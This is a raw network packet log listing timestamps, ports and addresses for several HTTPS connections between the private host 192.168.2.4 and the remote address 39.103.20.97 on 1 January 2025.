Jan 1, 2025 08:24:28.123790026 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.123797894 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.146018028 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.146029949 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.146097898 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.146260023 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.146270990 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.401856899 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.402730942 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.403065920 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.403074980 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.403240919 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.403247118 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.739962101 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.739985943 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.740020990 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.740048885 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.740062952 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.740197897 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.740225077 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.740271091 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.755616903 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.755678892 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.788805962 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.788870096 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.830754042 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.830841064 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.963066101 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.963150024 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.963179111 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.963233948 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.963833094 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.963890076 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.964562893 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.964629889 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.970597029 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.970663071 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:29.993957996 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:29.994070053 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.009462118 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.009618998 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.039731979 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.039871931 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.052990913 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.053072929 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.066378117 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.066452980 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.192936897 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.193001986 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.199516058 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.199604988 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.215153933 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.215219975 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.222724915 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.222791910 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.230372906 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.230437040 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.244868040 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.244935036 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.252100945 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.252170086 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.266166925 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.266330957 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.273286104 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.273349047 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.280217886 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.280303001 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.294334888 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.294404984 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.301321030 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.301387072 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.314784050 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.314963102 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.321400881 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.321465969 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.334824085 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.334889889 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.341356039 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.341414928 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.341425896 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.341525078 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.341574907 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.344540119 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.344552994 CET	443	49923	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.344561100 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.344666958 CET	49923	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.371154070 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.371169090 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:30.371279001 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.371462107 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:30.371473074 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.612440109 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.612510920 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.614729881 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.614738941 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.614903927 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.614907980 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.935139894 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.935161114 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.935214996 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.935226917 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.935240984 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.935277939 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.935612917 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.935663939 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.935921907 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.935970068 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:31.935970068 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.936012030 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.942491055 CET	49939	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:31.942501068 CET	443	49939	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:32.026093006 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:32.026110888 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:32.026432991 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:32.030194044 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:32.030225039 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.228362083 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.228442907 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.228768110 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.228774071 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.228948116 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.228951931 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.594662905 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.594680071 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.594765902 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.594775915 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.594914913 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.595546007 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.595601082 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.595609903 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.595624924 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.595655918 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.595679045 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.814810991 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.814873934 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.814898014 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.814950943 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.815778971 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.815839052 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.816255093 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.816289902 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.816308975 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.816314936 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.816330910 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.816354990 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.817285061 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.817337990 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.817344904 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.817388058 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:33.817403078 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:33.817430973 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.043521881 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.043584108 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.043732882 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.043781996 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.043824911 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.043864965 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.044620991 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.044657946 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.044670105 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.044683933 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.044693947 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.044722080 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.044758081 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.044805050 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.045635939 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.045689106 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.046025991 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.046077967 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.046145916 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.046188116 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.046195984 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.046220064 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.046248913 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.046257973 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.047091007 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.047138929 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.047147036 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.047163963 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.047192097 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.047203064 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.047224998 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.047228098 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.047251940 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.047281027 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.048083067 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.048131943 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.258219004 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.258367062 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.258414984 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.258421898 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.258450031 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.258457899 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.258632898 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.258687973 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.258754969 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.258801937 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.259092093 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.259140015 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.259141922 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.259149075 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.259180069 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.259180069 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.259200096 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.259203911 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.259233952 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.259257078 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.259903908 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.259946108 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.259973049 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.259977102 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.259984970 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.260008097 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.260031939 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.260035992 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.260076046 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.260684013 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.260730982 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.260740042 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.260752916 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.260782003 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.260792017 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.260796070 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.260849953 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.261601925 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.261647940 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.261658907 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.261668921 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.261701107 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.261723995 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.261737108 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.261784077 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.261804104 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.261807919 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.261853933 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.262455940 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.262502909 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.262511969 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.262567997 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.262583017 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.262634039 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.262667894 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.262722969 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.345196962 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.345247030 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.345321894 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.345362902 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.345362902 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.345371008 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.345400095 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.345407963 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.345518112 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.345571995 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.345580101 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.345601082 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.345634937 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.345644951 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.472851992 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.472918987 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.472963095 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473134995 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473165035 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473176003 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473189116 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473213911 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473258972 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473301888 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473395109 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473434925 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473444939 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473448038 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473474026 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473493099 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473694086 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473741055 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473798990 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473844051 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473893881 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473937035 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473939896 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473958015 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.473980904 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.473999977 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.474303007 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474350929 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474355936 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.474359989 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474390984 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474400043 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.474409103 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474445105 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.474463940 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.474611998 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474659920 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.474845886 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474885941 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474889994 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.474904060 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474926949 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474947929 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.474952936 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.474982023 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.475004911 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478024960 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478065014 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478072882 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478075981 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478106022 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478111982 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478126049 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478127956 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478136063 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478153944 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478185892 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478405952 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478450060 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478491068 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478540897 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478542089 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478559017 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478566885 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.478615046 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478615046 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.478974104 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479013920 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479022026 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.479033947 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479058027 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.479082108 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.479229927 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479275942 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.479425907 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479458094 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479480982 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.479485035 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479496956 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479501963 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.479527950 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:34.479531050 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:34.479542971 CET	49950	443	192.168.2.4	39.103.20.97
